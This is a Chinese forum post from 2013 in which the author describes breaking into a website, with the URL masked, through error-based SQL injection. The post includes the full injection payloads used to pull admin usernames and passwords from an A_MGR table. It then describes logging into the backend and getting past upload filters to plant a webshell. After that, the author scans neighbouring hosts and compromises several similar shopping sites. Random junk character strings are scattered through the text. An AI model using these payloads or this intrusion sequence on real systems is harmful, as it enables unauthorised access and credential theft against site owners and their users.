发现一个注入点 K9 O! i! v9 H6 Y4 C* j$ t
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389# a9 d7 X# O* }' c9 r3 Z7 ?
1 s. L" ^* u/ B/ M/ y5 {) T
习惯性的加’having1=1--$ n$ Q+ q3 n9 U- S; j
7 g: B, m# I/ Q) F& [0 whttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
( T8 m. z+ I/ i. O: a* U
! I% o3 _! J( D) g; F0
$ \1 F' {0 v" A- Z5 G2 k" X5 I5 b7 n' f* j+ Z
爆出Diary_A.dl_Title(这时候很激动啊)
8 x* S* c8 R: w/ p/ {) ]/ j% K! u5 }# g# t8 F2 V% h
那么继续
0 s# U b- ^! ^1 c6 Zhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—* d6 I% \# j4 Z ~
3 r; U8 b7 t& i" w
继续,一直爆下去
8 V4 b9 U$ N3 v- v% n1 G) L& o O6 x, \% a! l# K
爆到几个字段和表段 但是没找到需要的管理用户的字段
% |0 U Q& o1 N9 ?8 V! t8 N
# c! l. N. c# l: h+ O- q9 L蛋疼了 怎么办 然后去后台登陆页看源码0 B. `8 L: |) y, d4 O
7 Y# z& J X F* N0 j0
$ `: {* N# P9 T0 q. A! O+ A
: S+ }" U4 p- S4 CInput name= “ADUID”
' I1 k% s# K0 N4 j( Q- W' i: dInput name= “ADPWD”
( E2 d' v/ g* ]4 _ |( a( T% v2 W1 ~
# c6 g, _ i3 ^- e7 G很幸运 找到了字段那就继续
" G6 d( a/ N" b5 C找到之后开始爆用户
+ z# q. P# V) S# p# K4 Phttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
/ }- k( n" l4 A6 p/ a1 b爆密码
" i8 R3 b+ }$ _! rhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
3 e" V8 o7 W) D7 Q0 {1 c# T* l测试了下 这个注入点只能爆到文章哪里的表 % J( w) Z. [0 B: Y
: \' x! R0 w2 N
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
7 N, y& g" i9 W( `
: M0 ]/ F# o# f" y2 s& L Y又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了' {' Z1 n( S# G- t
! h& k' q9 m9 {) @7 N
473
/ c4 E' P' p/ \ |& j9 ^5 R" x6 D/ w& m9 n* x+ j1 ?+ ]
进后台% F5 |- ?+ q) u$ t
' C, o3 r8 t3 m- M; a7 }$ ?& P
0 E% s- n0 H; [# X8 [
发现几个上传点 有的地方不能上传 而且防止恶意代码
0 r) y! ]' ^# u3 o9 w6 I- Z
" v5 J% p' k8 Y没办法 各种百度各种找大牛 找到一只好像可以突破的马
3 N( b2 m' j t0 |) A) X& `% O8 b7 D# Y7 ^$ {: z
4 N% T2 N% U2 T6 `在系统管理那里直接上传 不过没有显示地址1 O7 t4 J1 _0 Y
& r7 i7 I* K: @8 X# Q4 b
再上传一次 抓包 搞定OK9 w! o/ `7 S# }2 c3 q5 @( I
3 V. z1 V( K& _' X3 C0 l O! `( A# h1 K q B% R) g' @
! P, r5 T, s2 ]& K* v+ Z6 z7 }
472
' B% `( q7 m5 g+ E# B$ z
+ D$ Y0 E" q8 o: |7 w" W# w3 \晚上不行了 去睡觉。。。
4 M2 l+ ]! ^. q/ a2 R第二天刚起床 闲的没事做继续日站吧 & R1 _8 ]3 h" @: I
+ _. q4 x; ]- x# V8 g找个站 就把这个站的旁c扫了下
$ m- Z# F( \- P9 A; r7 g0 v
; L& B: _" o* o* r+ C* G' s4 l) f发现c段也有一个购物站 ,然后还和这个站的模板差不多
# z8 }- g. Q' R; v" v
' {/ B' M5 Y% h就找到会员登录口测试
; V2 S- L4 E. e2 t: Y
K$ \" D+ P k- S" R'and (select top 1 MGR_UID from A_MGR)>0—0 D4 Q! z6 }- a4 K
果断爆到了 这时候我很激动 通杀
4 g: A' q, I# w% l5 _ p# S2 s+ [. D( S
再次翻c段
& \: t, I, U5 ]$ E" Q* I
- |9 G* |; Z' a. N6 |' U翻出几个站 都成功拿下
+ p' k% |/ Q k& I7 z1 `- O; _3 Z
& J$ E' R2 k6 Z# n) h. l
8 t V' G S: C! D' j; x1 g
) e1 V) R0 e! ]. ^8 I& d- @修复方案:0 `) C. ^0 |. L: }
他们比我专业 . ~( T% m# `+ h% k8 d8 }
' _/ w2 g# g/ b7 c, q) J! ^
: k2 y. @+ b1 J0 B; E& H& Z
3 s- }( e& `3 ?! K |
发表于 2013-4-4 17:40:38
收藏
支持
反对